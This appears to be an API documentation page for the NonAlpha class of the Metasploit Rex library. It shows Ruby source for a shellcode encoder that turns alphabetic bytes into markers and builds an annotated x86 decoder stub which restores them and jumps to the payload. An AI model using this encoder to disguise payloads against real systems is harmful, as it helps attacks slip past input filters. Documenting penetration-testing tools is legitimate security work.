Class: Rex::Encoder::NonAlpha

Inherits:
Object
 • Object
show all
Defined in:
lib/rex/encoder/nonalpha.rb

Class Method Summary collapse

Class Method Details

.encode(buf) ⇒ Object


46
47
48
49
50
51
52
53
54
55
56
57
58
59
# File 'lib/rex/encoder/nonalpha.rb', line 46

def NonAlpha.encode(buf)
 table = ""
 tablelen = 0
 nonascii = ""
 encoded = gen_decoder()
 buf.each_byte { |block|
  newchar, table, tablelen = encode_byte(block.unpack('C')[0], table, tablelen)
  nonascii += newchar
 }
 encoded.gsub!(/A/, tablelen)
 encoded.gsub!(/B/, tablelen+5)
 encoded += table
 encoded += nonascii
end

.encode_byte(block, table, tablelen) ⇒ Object


30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# File 'lib/rex/encoder/nonalpha.rb', line 30

def NonAlpha.encode_byte(block, table, tablelen)
 if (tablelen > 255) or (block == 0x7B)
  raise RuntimeError, "BadChar"
 end

 if (block >= 0x41 and block <= 0x5A) or (block >= 0x61 and block <= 0x7A)
  # gen offset, return magic
  offset = 0x7b - block;
  table += offset.chr
  tablelen = tablelen + 1
  block = 0x7B
 end

 return [block.chr, table, tablelen]
end

.gen_decoderObject


10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# File 'lib/rex/encoder/nonalpha.rb', line 10

def NonAlpha.gen_decoder()
 decoder =
  "\x66\xB9\xFF\xFF" +
  "\xEB\x19" +        # Jmp to table
  "\x5E"   +        # pop esi
  "\x8B\xFE" +        # mov edi, esi   - Get table addr
  "\x83\xC7" + "A" +     # add edi, tablelen - Get shellcode addr
  "\x8B\xD7" +        # mov edx, edi   - Hold end of table ptr
  "\x3B\xF2" +        # cmp esi, edx
  "\x7D\x0B" +        # jle to end
  "\xB0\x7B" +        # mov eax, 0x7B   - Set up eax with magic
  "\xF2\xAE" +        # repne scasb    - Find magic!
  "\xFF\xCF" +        # dec edi      - scasb purs us one ahead
  "\xAC"   +        # lodsb
  "\x28\x07" +        # subb [edi], al
  "\xEB\xF1" +        # jmp BACK!
  "\xEB"   + "B" +     # jmp [shellcode]
  "\xE8\xE2\xFF\xFF\xFF"
end